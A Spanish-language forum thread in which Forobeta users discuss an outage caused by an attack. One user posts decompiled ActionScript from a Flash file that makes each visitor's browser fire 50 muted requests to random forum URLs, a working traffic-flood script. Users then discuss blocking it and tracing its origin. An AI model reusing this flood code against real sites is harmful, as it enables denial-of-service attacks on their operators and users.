Forobeta fuera del aire y yo que entro en pánico!

• Autor Autor Luzka
  • Fecha de inicio Fecha de inicio
Luzka

Luzka

Iota
Verificación en dos pasos activada
Juro que he pasado la tarde-noche más aburrida de mi vida... sin forobeta ya no es lo mismo!

Que se acabe el facebook (Como alguna vez fue anunciado) pero no forobeta! porrr diooosss nooo!

ok ok...mucho drama, pero a poco no les hizo falta el foro???

A mí me entró síndrome de abstinencia 😕

La cosa es que todavía no salimos de esta, muchos usuarios siguen sin poder entrar :grumpy:

A mi me tarda una vida en cargar

Según Carlos fue un ataque, ojala ya todo vuelva a la normalidad :/

A mi me tarda dos vidas y media para cargar 😕

A mi me va rápido... creo que a algunos les va muy lento y otros lo pueden ver ya como si nada. Lo peor es que hay algunos que no pueden ingresar todavía.

Última edición:
efectivamente, va lento. En algunas secciones falla, en otras no, te sale el mensaje de que lo vuelvas a recargar o que lo busques en google.

Parece que a veces hay algún problema con la conversión de las direcciones amigables.

Venga, ánimo a ver si se restablece todo bien, mientras sufriremos un poco.

... Además todavía estamos en BETAAAAAAAAAAAA 🙂

A mi me va rápido... creo que a algunos les va muy lento y otros lo pueden ver ya como si nada. Lo peor es que hay algunos que no pueden ingresar todavía.

como un archivo .swf puede hacer un ataque?

Última edición por un moderador:
A mi las secciones no me cargan bien y por ratos me saca del foro y dice errores del sistema😡

Programadores a chambear para ver de donde esta insertado el atacante

Yo diría que por mientras deshabiliten el plugin Top 10 Stats (ese me tarda en cargar)

he decodificado el archivo que menciono carlos, es un AS (actionscript)

Insertar CODE, HTML o PHP:
//----------------------------------------------------------------------

//Frame 2

//----------------------------------------------------------------------

function strReplace(haystack, needle, replacement) {

var _local1 = haystack.split(needle);

return(_local1.join(replacement));

}

function reset() {

play();

}

setTimeout(reset, 2000);

this.createemptymovieclip("stats", 1);

this.stats._x = 0;

this.stats._y = 0;

this.stats.loadmovie("http://whos.amung.us/swidget/atk1m0u397bn/");

var target = new array("http://forobeta.com/adsense/?RNDS/RNDN/", "http://forobeta.com/social-media/?RNDS/RNDN/", "http://forobeta.com/blogger/?RNDS/RNDN/");

var tags = new array("mp3", "wisin-y-yandel", "cumbias", "salsa", "don-omar", "aventura", "plan-b", "vicente-fernandez", "ricardo-arjona", "salsa-romantica", "camila", "danza-kuduro", "alejandro-fernandez", "enrique-iglesias", "mana", "porta", "arabe", "luis-miguel", "angel", "juan-gabriel", "dj-angel-trakatra-alo-arabe", "ornekhikayekisa", "juan-luis-guerra", "villancicos", "daddy-yankee", "arcangel", "bryanflow", "llueve", "el-man-es-german", "music", "cartel-de-santa", "merengue", "cristian-castro", "cristiana", "navidad", "mago-de-oz", "chino-y-nacho", "siente", "marco-antonio-solis", "los-tigres-del-norte", "tito-el-bambino-mata", "guitar", "slow", "los-temerarios", "zion", "bronco", "hoy-lo-siento", "antonio-aguilar", "llueve-lorna-remix-djjan", "very", "thalia", "amor", "zion-y-lennox-amor-genuino", "roberto-carlos", "espinoza-paz", "jhon", "metalica", "ricardo-montaner", "calle-13", "siente-el-miembro-dj-jhon-ft-dj-bryanflow", "glee", "cosculluela", "chayanne", "sin-bandera", "ana-gabriel", "jose-jose", "trakatra", "tito-el-bambino", "remix", "lennox", "very-slow-guitar-music", "electronica", "ungu", "beatles", "bambino", "rihana", "leo-dan", "joan-sebastian", "juanes", "miembro", "percaya", "michael-jackson", "jesus-adrian-romero", "vallenato", "franco-de-vita", "africano", "popurri", "bachata", "luis-fonsi", "genuino", "musik", "kotak-pelan-pelan-saja", "vico-c", "alejandro-sanz", "padaku", "loca", "ungu-percaya-padaku-www-musik-corner-com", "miguel-bose", "laura-pausini", "mata", "zoe", "tito", "the-time", "cumbia", "binomio-de-oro", "reggaeton", "corner", "vallenatos", "jose-luis-perales", "ricky-martin", "rocio-durcal", "d-masiv-ft-kevin-aprilio-rindu-setengah-mati", "avatar-entering-ba-sing-se", "tercer-cielo", "intocable", "romance", "grupo-treo-pegate", "temerarios", "julio-iglesias", "marc-anthony", "americo", "la-arrolladora", "jerry-rivera", "selena-gomez", "grupo-niche", "corazon", "eminen", "ska-p", "restart", "nsdp-hannah-montana-old-blue-jeans-remixed", "tony-dize", "lorna", "setengah", "camilo-sesto", "si-no-le-contesto", "los-inquietos", "corridos", "baby-rasta-y-gringo-con-plan-b-ella-se-contradice", "mazapan", "iron-fist-motorhead", "kalimba", "bob-marley", "chico-trujillo", "feat", "gloria-trevi", "exalta-samba-ta-vendo-aquela-lua", "depeche-mode", "panda", "elvis-crespo", "gilberto-santa-rosa", "katherine-calma-este-dolor", "nigga", "javier-solis", "armonia-10", "lucero", "gondwana", "rata-blanca", "rancheras", "andres-calamaro", "los-bukis", "baladas", "marcos-witt", "reik", "calma", "acdc", "sean-paul", "bee-gees", "aprilio", "oaxaca", "samba", "frankie-ruiz", "banda-el-recodo", "pimpinela", "kendo", "gocho", "yuri", "diego-verdaguer", "este", "tego-calderon", "junior-kelly-marchena", "conjunto-primavera", "alexis-y-fido", "ruben-blades", "armada-mau-dibawa-kemana", "romantica", "enanitos-verdes", "pesado", "tony-rosado", "la-arrolladora-banda-el-limon", "pistas", "mc-caco", "corazon-serrano", "gerardo-ortiz", "michel-batista-cuando-los-sapos-bailen-flamenco", "sergio-vega", "kemana", "maelo-ruiz", "alex-ubago", "nirvana", "mix", "cent", "tigres-del-norte", "electro", "paul-mauriat", "baby-rasta-y-gringo", "salserin", "en-navidad-marcos-witt", "eric", "wwe", "centella", "alejandro", "ednita-nazario", "el-gran-combo", "tito-el-bambino-te-comence-a-querer", "mati", "scorpions", "chino-y-nacho-mi-nina-bonita", "guayacan", "cinta", "rock", "dame-un-momento-agua-marina", "arrolladora", "no-me-digas-que-no", "dolor", "farruko", "piraten", "chacalon-jr", "danza-kuduro-remix", "banda-machos", "el-tri", "guachinanga", "leya", "puramusicaparaguay", "rammstein", "pedro-fernandez", "dragon", "romanticas", "instrumental", "guns-n-roses", "tecno", "system-of-a-down", "sonora-dinamita", "karaoke", "ss501-love-ya", "baby", "disco", "panamericano", "na-de-na-feat-gocho-jon-eric", "korn", "dragon-y-caballero-fruta-prohibida", "alex-campos", "carlos-baute", "molotov", "gaitas", "los-iracundos", "flamenco", "bruno-mars", "merengues", "pink", "high-energy-mix", "el-komander", "chayane", "alejandra-guzman", "heroes-del-silencio", "aventura-el-perdedor", "david-gueta", "larry-hernandez", "chistes", "mezclas", "sonora-santanera", "banda-ms", "banda", "saja", "eagles", "los-nocheros", "jenny-rivera", "bob-esponja", "silvio-rodriguez", "titanic", "migajas-de-amor", "theme-instrumental", "omega", "estoy-enamorado", "hip-hop", "katherine", "soda-stereo", "enrique-bunbury", "victor-manuel", "rbd", "karina", "valentin-elizalde", "aidilfitri", "david-bisbal", "marisol", "biyaray-site-le-plus-populaire-au-maroc-2009-rai-chaabi-charki-video-tchat-cheb-aziz-boualam-2010", "jika", "iron-maiden", "kotak", "raphael", "junior-klan", "paling", "aquela", "black-eyed-peace", "mecano", "ungu-cinta-gila", "exalta", "ella", "forum", "daddy-yanke", "makano", "marcela-gandara", "pastor-lopez", "gila", "damas-gratis", "sandro", "stereo-love", "banda-dejavu-do-brasil-larga-do-meu-pe", "vendo", "nyolongmp3", "cuando-me-enamoro", "bruno-mars-just-the-way-you-are", "restart-te-llevo-conmigo-te-levo-comigo-espanhol", "extasis", "rosana", "wapistan", "la-yapa-los-nocheros", "peligro", "diomedes-diaz", "maria-jose", "dance", "hillsong", "hombres-g", "plan-b-el-amor-no-existe", "mp3-chamame", "dj-tiesto", "kenneth", "stanislao-marino", "yuridia", "jorge-celedon", "oscar-de-leon", "jowell-y-randy", "marco-di-mauro", "stones", "bpm", "calo", "black", "funk", "kristen", "loco", "vacio", "ss501", "erasure-stop", "llora-me-llama-en-portugues", "tito-rojas", "tango", "rakim-y-ken-y", "mp3-espinoza-paz", "teuku-wisnu-ft-shireen-sungkar-cinta-kita", "cafe-tacuba", "los-diablitos", "enganchados", "marchas-militares", "yomo", "akwid", "gloria-estefan", "diego-torres", "mdo", "la-factoria", "creedence", "kjarkas", "pandora", "pitbul", "babasonicos", "prohibida", "olga-tanon", "mijares", "wisin", "salsa-baul", "kotak-selalu-cinta", "los-gigantes", "restart-levo-comigo", "fitri", "fruta", "eddie-santiago", "pepe-aguilar", "jonas-brothers", "el-trono-de-mexico", "ana-barbara", "toto", "socca", "regueton", "tierra-cali-en-cambio-tu", "los-vasquez", "villancicos-flamencos-raya-real-la-virgen-gitana", "belanova", "arjona", "el-polaco", "cinta-satu-malam", "disponible-para-mi", "niche", "playbacks", "pit-bull", "el-choque-mr-saik", "los-panchos", "elefante", "la-despedida", "kiss", "buka", "ramon-ayala", "gitana", "cold-play", "emmanuel", "autenticos-decadentes", "lennon", "los-charros-de-lumaco", "julieta-venegas", "baladas-en-ingles", "caballero", "flauta", "changa", "de-la-ghetto", "el-general", "cypress-hill", "efectos", "rap", "snsd", "cristina-aguilera", "agua-marina", "diana-uribe", "jose-feliciano", "dido", "lady", "morodo", "ov7", "gerardo-reyes", "la-noche", "calle-8", "rafaga", "bondan-prakoso-fade-2-black-ya-sudahlah", "america-mp3", "hector-el-father", "dj-penny", "mi-vida-eres-tu", "dario-gomez", "naruto", "kesha", "nickelback-far-away", "los-fabulosos-cadillacs", "franco-el-gorila", "dj-sanny-j-ft-mc-ruly-fiesta-reggaeton", "kevin", "la-quinta-estacion", "chamame", "lambada-kaoma", "yandel", "billos-caracas-boys", "armada", "exterminador", "manu-chao", "prakoso", "bondan", "david-getta", "bla-bla-bla", "motorhead", "love", "edward-maya-this-is-my-life", "dante-spinetta-pa-tras-ft-calle-13", "air-supply", "firework", "fidel-rueda", "divino", "trance", "besame", "fade", "super-junior", "selamanya", "aerobic-01", "piratenhits", "es-un-secreto", "nino-bravo", "pelan", "los-pericos", "mp3-park-jung-min-not-alone", "nacho", "wilfrido-vargas", "plan-b-si-no-le-contesto", "mitchel-musso-ft-tiffany-thornton-let-it-go", "mocedades", "fito-paez", "miranda", "infantiles", "reggeton", "goong", "anak", "my-chemical-romance", "tego", "garras-de-amor-amor-prohibido", "star-wars", "selena", "amen", "electro-gospel", "big-bang", "atb-what-about-us", "u-kiss", "jaguares", "zion-y-lennox", "trono-de-mexico", "daniela-romo", "t-ara", "bailables", "kendo-kaponi", "aniceto-molina", "jambao", "luis-enrique", "magneto", "il-divo", "grantono-net", "piero", "luis-mateus", "blink-182", "git", "fruko", "paul-mccartney", "don-omar-ft-lucenzo-danza-kuduro", "dario-dario", "marimba", "timur", "la-ley", "paty-cantu", "reggae", "tito-nieves", "liberacion", "bachatas", "te-amo", "slipknot", "house", "rindu", "new-kids-on-the-block", "never-say-never", "factoria", "carlos-vives", "perlu", "el-original", "farruco", "sin-compromiso", "nelson-y-sus-estrellas", "las-chicas-del-can", "scorpions-still-loving-you", "sandungueo", "dj-peligro", "ilegales", "julio-jaramillo", "dibawa", "victor-manuelle", "leonardo-favio", "tatiana", "hey-soul-sister", "show", "huaynos", "marcos-barrientos", "baila", "charly-garcia", "flyer", "la-zorra", "banda-limon", "quien-te-quiere-como-yo-carlos-baute", "chino-y-nacho-tu-angelito", "los-kuatreros-del-sur", "bonita", "dady-yanke", "jose-alfredo-jimenez", "rompe", "tu-angelito", "madona", "tu-angelito-soy-yo-chino-y-nacho", "mantras", "california-girls", "jenifer-lopez", "daddy", "gigantes", "estopa", "enrique", "calibre-50", "mike-mareen", "adamo", "christian-castro", "techno", "boleros", "oro-solido", "seconds-to-mars", "dj-pinky", "macano", "caifanes", "tiesto", "tu-angelito-soy-yo", "nsamble", "barra-box", "dj-sanny-j-feat-ruly-mc-fiesta-reggaeton", "corazon-vacio-by-leya", "sin-compromiso-j-balvin", "gerardo-moran", "debes-comprenderme", "plan-b-por-que-te-demoras", "rem", "lo-mejor-de-mi-vida-eres-tu-ricky-martin", "high-energy", "fone", "demi-lovato", "el-chofer", "en-cuatro-no-se-ve", "edward-maya", "grupo-5", "la-india", "tony-vega", "black-eyed-peace-the-time", "kumbia-kings", "indu", "pista", "xuxa", "angelica-maria", "duffy-mercy", "nestor-en-bloque", "reykon", "cinta-kita-shireen-sungkar-ft-teuku-wisnu", "dekat", "dhani", "omar", "minutos", "guaco", "feliz-cumpleanos", "rojo", "grupo-gale", "scott-brown", "mix-reggaeton-2010", "jorge", "cumbia-tribal", "tropikal", "coro-del-tabernaculo-mormon", "radiohead", "cuisillos", "jiggy-drama-contra-la-pared-2010", "morena-rayo-toby-ft-jiggy-d-by-orlysflow", "timbiriche", "huayno", "brindis", "sudahlah", "fuerte-apache", "tapi", "cultura-profetica", "evanescence", "hector-lavoe", "desireless-voyage-voyage", "jhonny-rivera", "kisah", "gutawa", "soda-estereo", "moenia", "fito-paez-recuerdos-que-no-voy-a-olvidar", "zmoky", "pet-shop-boys", "la-mafia", "solos", "playa-limbo", "celia-cruz", "lo-mejor-de-mi-vida-eres-tu", "chacalon", "andres-de-leon-este-amor-me-esta-matando", "la-renga", "la-repandilla-el-amor", "randy", "guns-roses", "pascualillo", "los-50-de-joselito", "masih", "chino", "camila-besame", "dembow", "regeton", "los-wawanco", "la-apuesta", "snap", "loba", "love-the-way-you-lie", "pavarotti", "menudo", "amar-azul", "gringo", "la-oreja-de-van-gogh", "enrique-guzman", "prince-royce", "quynh", "benci", "cerati", "dread-mar-i", "arrolladora-banda-el-limon", "tono-rosario", "noche-de-entierro", "azul", "pasodoble", "sanfona", "sombra-azul", "es-un-secreto-plan-b", "pop", "estar-contigo", "cradle-of-filth", "mozart", "los-cantores-de-chipuco", "tina-turner", "anime", "teuku", "trebol-clan", "dj-tavo", "eletronica", "los-melodicos", "remix-cd-luciana-gimenez-superpop2-dj-wagner", "akhir", "carrasco", "tito-el-bambino-mi-cama-huele-a-ti", "pipe-calderon", "las-mananitas", "hechizo", "hector-acosta-el-torito-me-duele-la-cabeza", "nectar", "megamix", "inuyasha", "perreo-2010", "semangat", "rkt", "los-angeles-negros", "fly-away", "te-gateo-pipe-calderon", "tiradera", "fernando", "orquesta", "mercedes-sosa", "amanda-miguel", "boney-m", "mikha-tambayong-bekas-pacar", "perreo", "paulina-rubio", "charlie", "zona-ganjah", "payaso-de-rodeo", "florida", "vilma-palma", "ven-a-mi-casa-esta-navidad", "danubio-azul-vals", "solo", "more", "hillsong-united", "julion-alvarez", "megadeth", "chicha", "best", "maya", "band", "chopin", "team", "placebo", "coqueta", "justin", "dyango", "eddy-herrera", "reik-sabes", "dejalo-que-se-vaya-marvin-feat-betty-german", "alex", "elvis", "abel-pintos", "hurricanes-and-suns", "rock-en-espanol", "wisnu", "ungu-percaya-padaku", "miriam-hernandez", "reggeaton", "emanuel", "abrazame", "fugidinha", "punya", "de-los-80", "felipe-pelaez", "cumbia-juan", "rigeo-verdadera-conexion", "electro-reggaeton", "nexus-wwe", "rubby-perez", "florida-low", "la-nena-de-papa", "demi", "nurhaliza", "jatuh", "margarita", "trono-de-mexico-el-uno-para-el-otro", "plan", "siti", "creed", "gilberto-santarosa", "los-caminantes", "rasta", "brisk", "dengan", "jauh", "citra", "taylor-swift", "guardian", "tiziano-ferro", "pod", "chino-nacho-y-el-potro-alvarez-bla-bla-bla", "tito-el-bambino-pepe", "jesus", "maria", "geisha-jika-cinta-dia", "simone", "rescate", "masiv", "guns-and-roses", "porongo", "benny-ibarra", "j-king-y-el-maximan-estrellita", "blur", "darvin-pensa-em-mim", "the-ramones", "recodo", "proyecto-uno", "estoy-enamorado-wisin-y-yandel", "rivera", "police", "anahi", "bigbang", "mezcla", "the-police", "wisin-y-yandel-suave-lento-el-momento", "natalino", "genx", "wisin-y-yandel-mp3", "dewa-19-manusia-biasa", "yesus", "grupo-alegria", "sonidos", "lupillo-rivera", "lucenzo", "hora-loca", "vampiros", "nelly", "yo-no-se-manana", "lucybell", "marcos-yaroide", "grupo", "lorna-bennett-breakfast-in-bed", "saya", "stop", "simply-red", "adios", "patrick-miller", "alvaro-torres", "hello", "zion-y-lenox", "a-ha-take-on-me", "amigo", "tom-waits", "a-mi-manera", "libre", "i-like-it", "drive-akulah-dia", "kobe", "vanilla-ice-ice-ice-baby-instrumental", "exitos-caliche", "pertiwi", "lala", "porta-sin-ti", "aventura-por-un-segundo", "dj-pochoclo", "james-blunt", "tatu", "jerry", "nengo-flow", "peliculas", "waka-waka", "tu-mirada", "illapu", "disney", "mi-amor-es-pobre", "la-vela-puerca", "supernova", "perdedor", "edith-aravena", "monica-naranjo", "serrat", "nickelback", "gaga", "soundtrack", "calle", "los-terricolas", "marc-antony", "bad-romance", "barney", "lizandro-meza", "era", "perdoname", "dj-ricky", "j-king", "george-michael", "china", "nelson-velasquez", "horoscopos-de-durango", "janis-joplin", "complices", "jiggy", "lambada", "don-omar-2011", "tigres-norte", "gerardo-mejia-no-me-podran-vencer", "fidel-nadal", "buddy-richard", "pipe", "dj-j", "anang-hermansyah-ft-syahrini-jangan-memilih-aku", "karicia", "papo", "franck-pourcel", "nidji-dosakah-aku", "blondie", "despedida", "crazy", "j-king-y-maximan", "fobia", "revolta", "river", "savage", "ternura", "deep-purple", "golpe-a-golpe", "biper-los-pollitos", "en-el-centro-comercial-rosmery-marval-nps-no-puede-ser", "enough", "lavoe", "ayumi-hamasaki", "vangelis", "mangu", "vicentico", "dalila", "led-zepellin", "andy-y-lucas", "shinee", "ringtones", "marck-antony", "david", "camaron-caramelo", "sandy-papo", "camila-alejate-de-mi", "fares-karam", "sergio-vargas", "lentos", "lucero-paseo-en-trineo", "shel", "casi-angeles-2010-donde-estas", "los-bybys", "natusha", "susana", "sarah-brightman", "melendi", "esto", "sirve", "salvador", "entere", "cepillin", "easy", "the-cure", "aidil", "jowel-y-randy", "secreto", "champeta", "corazones", "gita-gutawa-malu-tapi-mau", "titanes", "ghetto", "soltero-los-verduleros", "sister", "alejate-de-mi", "nuevo", "tanpa", "banda-cuisillos", "oscar-medina", "musica", "gaskins", "duck-sauce-barbra-streisand", "olodum", "gracias", "turner", "caramelos-de-cianuro", "danza", "sin-banderas", "sergio-dalma", "eros-ramazzotti", "clasica", "khriz", "dewi-sandra-kapan-lagi-bilang-i-love-you", "la-bomba-loca", "rakin-y-ken", "eric-clapton-tears-in-heaven", "silbido");

var i = 1;

while (i <= 50) {

var nTag = math.floor(math.random() * tags.length);

var urlFile = target[math.floor(math.random() * target.length)];

urlFile = strReplace(urlFile, "RNDS", tags[nTag]);

urlFile = strReplace(urlFile, "RNDN", nTag.tostring());

trace(urlFile);

this["mp3" + i] = new sound();

this["mp3" + i].loadsound(urlFile, true);

this["mp3" + i].setvolume(0);

i++;

}

stop();

No vean el archivo que joden más el Foro XD

En si el archivo es sencillo, falta saber desde donde es enlazado, seguramente es desde algún sitio de un usuario pues el ataque va directamente al foro.

Tips:
* Yo apuesto a que el flash esta incrustado en Taringa! debido al origen de las visitas y al cantidad (valla +1.000 visitas en menos de 48 horas y casi todas de países de centro y sur-america) así que si algún usuario vio por aquí un post de Taringa con contadores de whos.amung.us probablemente pueda encontrar al usuario.
* Si alguien conoce alguna herramienta para buscar backlinks que pueda servir para rastrear un archivo específico con eso se puede.

En el código que decodificó Julcar está todo. Es un iframe de un contador y que está modificado.

En el código que decodificó Julcar está todo. Es un iframe de un contador y que está modificado.

Se sabe como funciona pero pararlo es lo difícil. En teoría ahorita se está bloqueando desde el .htaccess, mañana cuando hya más tráfico nos daremos cuenta si funcionó o no. Como sea lo raro es que para algunos sigue muy lento el foro y otros no pueden acceder, sospecho que el firewall se puso a trabajar y terminó bloqueando a muchos usuarios.

Yo recién puedo entrar:welcoming:. Pero me va súper lento:sorrow:

Carlos, tienes el reporte de Ips que ingresaron desde el momento del ataque?

se que puede ser inaudito, pero si se encuentra un patron (como por ejemplo pais mas recurrente entre las ips) se puede dar con algun indicio (ya parezco de CSI)